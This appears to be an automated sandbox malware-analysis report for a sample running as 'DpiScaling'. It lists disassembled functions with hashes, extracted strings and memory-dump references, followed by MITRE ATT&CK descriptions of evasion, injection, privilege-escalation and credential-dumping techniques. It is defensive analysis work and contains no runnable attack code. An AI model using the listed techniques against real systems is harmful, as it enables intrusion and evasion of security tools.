Instruction ID: aa6e2d709d9e9a0a6b581a38cc468a53ac647f7a3e359545d6c73ad2250f3d96
Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
Instruction Fuzzy Hash: 9DD0A967B0001C3AAA124594ACC1DFEB72CEB85AA6F004063FB08EA140E6228D020AB0

Function 04852C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852C24

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6ef73a57d843763a5b8d0845c73b6723a430a59527a99f95ad3e4d1743226ad
Instruction ID: 3b971537d94d9248fff0ece5f721104b250daa00daacb9ee134a39f0aa96fbf3
Opcode Fuzzy Hash: b6ef73a57d843763a5b8d0845c73b6723a430a59527a99f95ad3e4d1743226ad
Instruction Fuzzy Hash: C4B02B718024C0C9FB00F720060870739006BC0301F15C561D3034242F0738D0C0E172

Non-executed Functions

Function 045204E8 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3911585710.0000000004520000.00000040.00000800.00020000.00000000.sdmp, Offset: 04520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4520000_DpiScaling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af3be82383f1745c3c86962c63616ef3f5a1f22672b3464158b5603cced095d7
Instruction ID: 7257ef4c67d16f65a539d20728700ea74b1573020832fae0697320959f22f0ba
Opcode Fuzzy Hash: af3be82383f1745c3c86962c63616ef3f5a1f22672b3464158b5603cced095d7
Instruction Fuzzy Hash: A441D971619F1E4FD368EF68908167AB3E1FB86304F50052ED98AC36D2EB74F8468785

Function 0452DE89 Relevance: 56.5, Strings: 45, Instructions: 212COMMON

Download Yara Rule

Strings

@@@@, xrefs: 0452E053
123@, xrefs: 0452DF88
%&'(, xrefs: 0452DF73
@@@@, xrefs: 0452E006
@@@@, xrefs: 0452E014
@@@@, xrefs: 0452E029
@@@@, xrefs: 0452DFB9
@@@@, xrefs: 0452DFAB
!"#$, xrefs: 0452DF6C
@@@@, xrefs: 0452E01B
@@@@, xrefs: 0452DFC0
@@@@, xrefs: 0452DF8F
@@@@, xrefs: 0452DFEA
@@@@, xrefs: 0452DF57
@@@@, xrefs: 0452E030
@@@@, xrefs: 0452DFF8
?, xrefs: 0452E080
@@@@, xrefs: 0452E00D
@@@@, xrefs: 0452DFFF
@@@@, xrefs: 0452E05A
@@@@, xrefs: 0452DF96
@@@@, xrefs: 0452DFF1
@@@@, xrefs: 0452E06F
@@@@, xrefs: 0452DFCE
@@@@, xrefs: 0452DFA4
@@@@, xrefs: 0452E04C
<=@@, xrefs: 0452DF18
)*+,, xrefs: 0452DF7A
@@@@, xrefs: 0452DFE3
@@@@, xrefs: 0452DF9D
@@@@, xrefs: 0452E061
@@@@, xrefs: 0452DFB2
@@@@, xrefs: 0452E045
@@@@, xrefs: 0452E022
@@@@, xrefs: 0452E037
@@@@, xrefs: 0452DFD5
4567, xrefs: 0452DF0A
-./0, xrefs: 0452DF81
@@@@, xrefs: 0452DF1F
@@@?, xrefs: 0452DF03
89:;, xrefs: 0452DF11
@@@@, xrefs: 0452E03E
@@@@, xrefs: 0452DFDC
@@@@, xrefs: 0452DFC7
@@@@, xrefs: 0452E068

Memory Dump Source

Source File: 00000009.00000002.3911585710.0000000004520000.00000040.00000800.00020000.00000000.sdmp, Offset: 04520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4520000_DpiScaling.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: a5d8b591a12bf4ea40b691262310355cf58366af5c12575b306bfe81920b8f1f
Instruction ID: ec1a2fd09d3ca60c3c0fad709cab09df5d03e62afc46ae4cac22dbc511df0945
Opcode Fuzzy Hash: a5d8b591a12bf4ea40b691262310355cf58366af5c12575b306bfe81920b8f1f
Instruction Fuzzy Hash: 29915FF04482988AC7158F54A1652AFFFB1EBC6305F15816DE7A6BB243C3BE8905CB85

Function 04523B4F Relevance: 21.3, Strings: 17, Instructions: 67COMMON

Download Yara Rule

Strings

:14=, xrefs: 04523C40
9*1w, xrefs: 04523C4E
449w, xrefs: 04523B70
mkov, xrefs: 04523C55
;37q, xrefs: 04523C0F
lvlv, xrefs: 04523B9F
- cx, xrefs: 04523B8A
x413, xrefs: 04523C01
kvik, xrefs: 04523C32
mvhx, xrefs: 04523B7C
aiax, xrefs: 04523BB4
71<x, xrefs: 04523B98
ovkn, xrefs: 04523BEC
,wmk, xrefs: 04523BE5
llvh, xrefs: 04523C24
vjlh, xrefs: 04523C2B
75=w, xrefs: 04523C1D

Memory Dump Source

Source File: 00000009.00000002.3911585710.0000000004520000.00000040.00000800.00020000.00000000.sdmp, Offset: 04520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4520000_DpiScaling.jbxd

Similarity

API ID:
String ID: ,wmk$- cx$449w$71<x$75=w$9*1w$:14=$;37q$aiax$kvik$llvh$lvlv$mkov$mvhx$ovkn$vjlh$x413
API String ID: 0-1011141404
Opcode ID: 9ac65d4326124d99dd24aa57023913122e3e8ff5c404886ff1c2ad87570c6cf9
Instruction ID: 77bf707ffbae059eac3f5fc83733074e8f9de31c93293e16456aa1b267b1c2d3
Opcode Fuzzy Hash: 9ac65d4326124d99dd24aa57023913122e3e8ff5c404886ff1c2ad87570c6cf9
Instruction Fuzzy Hash: DC3135B4904749EBCB149F88D445ADE7BB1FF01358F818459E8097F385C7398669CB8A

Function 04852890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0485293C
___swprintf_l.LIBCMT ref: 0485295E
___swprintf_l.LIBCMT ref: 048529A3
___swprintf_l.LIBCMT ref: 0488A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 0488A527
::ffff:0:%u.%u.%u.%u, xrefs: 0488A54E
ffff:, xrefs: 0488A504
:%u.%u.%u.%u, xrefs: 0488A5B8

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 68ae5f5ef53eaf233b794a33ce758d41ae2732ceb1be2cf52a79d34ada023735
Instruction ID: f84e5edc8b8e5f79b7f9fa10d3f6db44e9cc2b8ae9ea33b905b570a3d9177d7d
Opcode Fuzzy Hash: 68ae5f5ef53eaf233b794a33ce758d41ae2732ceb1be2cf52a79d34ada023735
Instruction Fuzzy Hash: 0E51FBB5A0011A7FDB15EF98888097EF7B8BB082047108B69E865D7641D774FE409BE1

Function 048C2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 048C24A6
___swprintf_l.LIBCMT ref: 048C24E2
___swprintf_l.LIBCMT ref: 048C257D
___swprintf_l.LIBCMT ref: 048C25A3
___swprintf_l.LIBCMT ref: 048C25C8
___swprintf_l.LIBCMT ref: 048C2608

Strings

:%u.%u.%u.%u, xrefs: 048C25FF
::%hs%u.%u.%u.%u, xrefs: 048C249E
ffff:, xrefs: 048C247D, 048C249D
::ffff:0:%u.%u.%u.%u, xrefs: 048C24DA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 8bfd3e1213a634ef9c4b8817efd7625718f547474d5a1e35771a111bc35baf2d
Instruction ID: 4d549496f4a1b3f7905f4185a4d8b8f06227f6b1f1443b624cf22f3afddd4df8
Opcode Fuzzy Hash: 8bfd3e1213a634ef9c4b8817efd7625718f547474d5a1e35771a111bc35baf2d
Instruction Fuzzy Hash: D451D575E00645AFDB70DF9CC89097FB7F9AB44204B048EAEE496D76C1E6B4FA408760

Function 04847630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04884742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04884725
Execute=1, xrefs: 04884713
CLIENT(ntdll): Processing section info %ws..., xrefs: 04884787
ExecuteOptions, xrefs: 048846A0
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04884655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048846FC

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: bf87277a3a785f3bf480fc523739b94c0c05940199c053c23aae3dd47c768780
Instruction ID: 511c104ba4dfde6ae197c0261e978e6e6eaa4600063f94ccb8ed2782a8b02aa9
Opcode Fuzzy Hash: bf87277a3a785f3bf480fc523739b94c0c05940199c053c23aae3dd47c768780
Instruction Fuzzy Hash: 9A51483160020DAAEF14BEA8DC85FA937B9EF44708F440AA9D605E7290F7B0BE45CF51

Function 0485B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0485B6BF

Strings

0, xrefs: 0485B695
+, xrefs: 0485B65A
0, xrefs: 0485B66F
-, xrefs: 0485B650

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: afae1f0267aad747409d55bc85c455d1b5eeeb7f4f2abc73796a8bbcbeb18e04
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: D481A070E052499FDF288E68C8917FEBBB2AF65354F184B59EC61E72A0D734B8408B51

Function 048C20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 048C214F
___swprintf_l.LIBCMT ref: 048C2172

Strings

%%%u, xrefs: 048C2146
[, xrefs: 048C212B
]:%u, xrefs: 048C2169

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: f66aa3f6634f3113602b8a552db47f80c31aff3226b159cb0825c491236acac9
Instruction ID: 05abf799129a54b4a6029c492f357c4be5dff8dda8f20464a33f5a8da396c16d
Opcode Fuzzy Hash: f66aa3f6634f3113602b8a552db47f80c31aff3226b159cb0825c491236acac9
Instruction Fuzzy Hash: 34215376E00119ABDB11EEA9CC40AAE77F8EF44744F040A6AED05D3240E770F9018BA1

Function 0483F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048802BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048802E7
RTL: Re-Waiting, xrefs: 0488031E

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: f67c02e826c80f0691d3eb0293e9753265d2bbbde40b616ac03f737a27243444
Instruction ID: ba8e86c76283d1a015ade3462a401844e430037349e69849f42bceea41a72ec8
Opcode Fuzzy Hash: f67c02e826c80f0691d3eb0293e9753265d2bbbde40b616ac03f737a27243444
Instruction Fuzzy Hash: C5E18F30A047459FD725DF28C884B2AB7E0AB49318F154F5DE6A5CB2E1E774F844CB82

Function 0484BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 04887B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04887B7F
RTL: Re-Waiting, xrefs: 04887BAC

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 5d84f2c3e997e263d2f2d0f1c7211764551ebf80385f41dbd5732d863508ba23
Instruction ID: b9f326b7856e9be5e86ce4bd8ca887a4fff0e32d6f31867501547baada39b05b
Opcode Fuzzy Hash: 5d84f2c3e997e263d2f2d0f1c7211764551ebf80385f41dbd5732d863508ba23
Instruction Fuzzy Hash: 7841AC317017069BDB24DF298940B6AB7E5EB88714F100F2DE95ADB680DB61F9058BA2

Function 0484B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0488728C

Strings

RTL: Resource at %p, xrefs: 048872A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04887294
RTL: Re-Waiting, xrefs: 048872C1

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 2e987ed57ffb792b55a66a760335fd2d9d9600ef206f868b30cb0311c99d29df
Instruction ID: 17fde16cfd97271e547c2781dee4e161af6ff932a0affa12df4b0081266df9bb
Opcode Fuzzy Hash: 2e987ed57ffb792b55a66a760335fd2d9d9600ef206f868b30cb0311c99d29df
Instruction Fuzzy Hash: 1C41F43170060AABD724EE29CC41B66B7B5FB84718F240F1DFA56EB240DB61F8528BD1

Function 048C2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 048C238D
___swprintf_l.LIBCMT ref: 048C23B3

Strings

%%%u, xrefs: 048C2384
]:%u, xrefs: 048C23AA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 7089f42779a1470863f710e0f71174b9158e1a06039066e2ca3eed2464f6dedd
Instruction ID: 184c8584c61b4f4348cc83018d559d837ccd5fc4ed4775268e1d2ef17eaf0047
Opcode Fuzzy Hash: 7089f42779a1470863f710e0f71174b9158e1a06039066e2ca3eed2464f6dedd
Instruction Fuzzy Hash: A9315B729001199FDB60DE3DCC40BEE77B8EB44614F444A99E849D3190EB30FA549B91

Function 04857D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04857E8B

Strings

-, xrefs: 04857DDD
+, xrefs: 04857DE8

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: cb6305031f59038daa543bc481dc0fb07e4fd7696eecca268986358a7404248b
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 3A91B470E002199FDF24DE69C880ABEB7A5EF44724F548F1AEC55E72E0E770B9408B61

Function 04819126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 04819175
$, xrefs: 04819191

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: fbd03eb17ac5ada0117ec115cd74137d8c8b6570e998ad4280dd8d5878077a33
Instruction ID: d8aa7525fbdee326a576a55dc159727246399643a06f93708ebcd4386f8aac11
Opcode Fuzzy Hash: fbd03eb17ac5ada0117ec115cd74137d8c8b6570e998ad4280dd8d5878077a33
Instruction Fuzzy Hash: 03812DB1D002699BDB35CB54CC54BEAB7B8AB08714F0046EAE919F7250D774AE84CFA1

Function 045239B0 Relevance: 5.0, Strings: 4, Instructions: 34COMMON

Download Yara Rule

Strings

~r67, xrefs: 045239C7
7, xrefs: 045239DC
4>3&, xrefs: 045239D4
5(;", xrefs: 045239E4

Memory Dump Source

Source File: 00000009.00000002.3911585710.0000000004520000.00000040.00000800.00020000.00000000.sdmp, Offset: 04520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4520000_DpiScaling.jbxd

Similarity

API ID:
String ID: 4>3&$5(;"$7$~r67
API String ID: 0-3727003070
Opcode ID: 596c6ffd817cf94aec252ddebc447bfe025ba228ef186448957f87c7d95ff4cf
Instruction ID: 85b4668cc55acaa396d7f1268ae4c09d2e0dca1b63ac17f3c7e67dea6f13be20
Opcode Fuzzy Hash: 596c6ffd817cf94aec252ddebc447bfe025ba228ef186448957f87c7d95ff4cf
Instruction Fuzzy Hash: 9DF0B43502878497CB049F24C484596B7E1FBCA30DF84069EE88EDB150DA399606CF4A

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

